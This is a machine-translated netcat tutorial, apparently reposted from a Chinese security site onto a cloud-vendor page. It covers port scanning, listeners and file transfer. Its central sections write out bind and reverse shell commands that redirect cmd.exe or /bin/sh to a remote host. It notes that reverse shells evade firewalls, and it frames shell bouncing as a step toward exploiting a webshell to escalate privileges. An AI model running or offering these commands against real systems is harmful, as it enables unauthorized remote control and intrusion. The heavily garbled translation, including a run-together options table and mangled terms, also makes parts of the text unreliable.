Netcat User Manual

Source: Internet
Author: User

Introduction: in the network tools have "swiss Army knife" reputation of netcat (hereinafter referred to as nc), in our use for n years has still been admiringly. Because it is short and concise (this is suitable for use in it, now someone has modified it to about 10K, and the function is not reduced).
Parameter format connected to somewhere: NC [-options] hostname port[s] [ports] ... Listening port waiting for connection: nc-l-p Port [-options] [hostname] [port] main parameters:

options:-d              no command line interface, use background mode-e prog          program redirection [dangerous!!] -G Gateway       Source route hop point, not exceeding 8-g Num          source route indicator: 4, 8, ...-h              Get help information-i secs           delay setting, port scan with-l               Listener inbound Information-l              Listener knows Netcat is ended (can be Disconnected)-n is              a digitally represented IP address-o file           make a binary record-p port          open Local port               -r random local and remote port-s addr          Local source Address-t               answer inbound requests as Telnet-u              UDP mode               -v Displays details [use =vv for more detailed information]-w secs          connection Timeout setting-z               I/O mode [when scanning] The port number can be single or there is a range: m-n [contains value].

Main uses generally we use netcat to do the most things for the following three kinds: 1, scan the specified IP port case 2, port forwarding data (focus) 3, submit a custom packet

1, Scan Common commands. the domain name can be used at the following ip, and NC calls NDS to resolve to an IP address.

"command" nc-v IP Port "for example" nc-v 96.44.174.9 80 "explains" Scan a port of an ip, return port information verbose Output.

"command" nc-v-z IP port-port "for example" nc-v-z 96.44.174.9 80-1024 "interpretation" Scan a port segment of an ip, return the port information verbose output, But the scanning speed is very slow.

"command" nc-v-z-u IP port-port "for example" nc-v-z-u 96.44.174.9 25-1024 "explains" scanning a UDP port segment of an ip, returning the port information verbose output, but scanning is slow.

"command" nc-nvv-w2-z IP port-port "for example" nc-nvv-w2-z 96.44.174.9 80-1024 "explains" to sweep the port segment of an ip, the connection time-out is 2 seconds. Instance:


Summary: the use of NC scanning speed really do not compliment, and for the scan host survival, port, or to more professional nmap to carry out, use the best is the hard truth, here all when popular science.

2, Listening port, connection port, turn to the terminal common COMMANDS.

"command" nc-l-p 520 "explains" turns on the native TCP 520 port and listens for data transferred on the secondary port.

"command" nc-l-v-p 520 "explains" turns on the native TCP 520 port and outputs the information that is heard to the current CMD window. This command is also the basis for port forwarding Shells.

"command" nc-l-p 520 > C:/log.dat "explain" turns on the native TCP 520 port and outputs the information you hear to the log file under C:/log.dat.

"command" NC-NVV 192.168.1.101 520 "explanation" connects to the 192.168.1.101 Host's 520.

Focus one (forward connection): "remote run" nc-l-p 2012-t-e c:windowssystem32cmd.exe "local run" nc-nvv 192.168.1.101 2012 "explanation" using a positive connection, remote host (note: Assume that the IP address is 192.168.1.101) run nc-l-p 2012-t-e cmd.exe meaning to bind the remote host CMD to Port 2012, when the local host connection to the remote host succeeds will return to the local host a cmd Shell; run nc-nvv on localhost 192.168.1.101 2012 is used to connect a remote host that has redirected CMD to a 2012 port (note: the IP address is assumed to be 192.168.1.101).

Key two (reverse connection): "run locally" nc-l–vv-p 2012 "remote run" nc-t-e c:windowssystem32cmd.exe 192.168.1.102 2012 "interpretation" using reverse connection, first in the local host (with public Ip) shipped Line nc-l–vv-p 2012 Open 2012 port and listen for remote host connection; run NC-T-E cmd.exe 192.168.1.102 2012 on the remote host to redirect CMD from the remote host to the IP address of 192.168.1.102 On a host with a port number of 2012, the host with the IP address 192.168.1.102 after the connection succeeds will get a cmd Shell.


Summary: This is the most commonly used intranet port forwarding function, so the shell can be bounced to execute the COMMAND. Reverse connection is commonly used to bounce the shell to the local, because the host actively send the situation of the local firewall and other devices generally do not intercept, and is connected to a remote host port is often intercepted. Example: (above A cmd is a public IP host, the author of the local host, you can see through the directory Shell executable Command)

4, Submit data, File Transfer Common commands

"command" NC-VV www.91ri.org Port < c:/http.txt "for example" nc-vv www.91ri.org < C:/http.txt "explain" commit http.txt inside packet to www.91ri.org 80 port, THE-VV parameter slows down the speed, but you can track the Process. For example, a iisput vulnerability could be used to customize a packet submission using this METHOD.

"command 1" nc-v-n IP Port < c:/sunzn.exe

"command 2" nc-v-l-p port > D:/sunzn.exe "explanation" run locally nc-v-n IP Port < c:/sunzn.exe means to read the contents of the Sunzn.exe file from the local C packing directory and put these numbers It is sent to the corresponding port on the remote host (note: the IP on the command line is the remote host IP receiving the file), running Nc-v-l-p port > D:/sunzn.exe in the remote host to listen to the corresponding port and write the received information data to d:/sunzn.exe, two The line command implements the transfer of the file between the local host and the remote Host. To transmit an instance of an HTTP Packet:


Netcat use of good things in a Linux environment must be available in a variety of environments, as well as Netcat available in Linux Environments. The main process is as Follows. The majority of Linux rights are on the local Exploit. Webshell generally can execute commands, but overflow must run in an interactive environment, otherwise if the direct execution in the webshell, even if the overflow of the right to succeed, can not be exploited. It is therefore necessary to bounce a shell command-line window and execute the overflow at the command-line terminal to raise the Power.

Main Steps:

1, Wget a tar compression NC Wget Http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download-O Netcat-0.7.1.tar.gz

2. Unzip the file tar zxvf netcat-0.7.1.tar.gz

3. The directory CD netcat-0.7.1 will be generated after the decompression is completed

4, Configure the Environment./configure

5. After the configuration is finished, it can be compiled. Make

6, compiled successfully generated NETCAT executable files, located in the SRC directory, CD into the Run. the/netcat file is our Nc.

Remote Linux forward Command./netcat 8.8.8.8 1234-e/bin/sh from:http://www.91ri.org/7761.html

Netcat User Manual

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.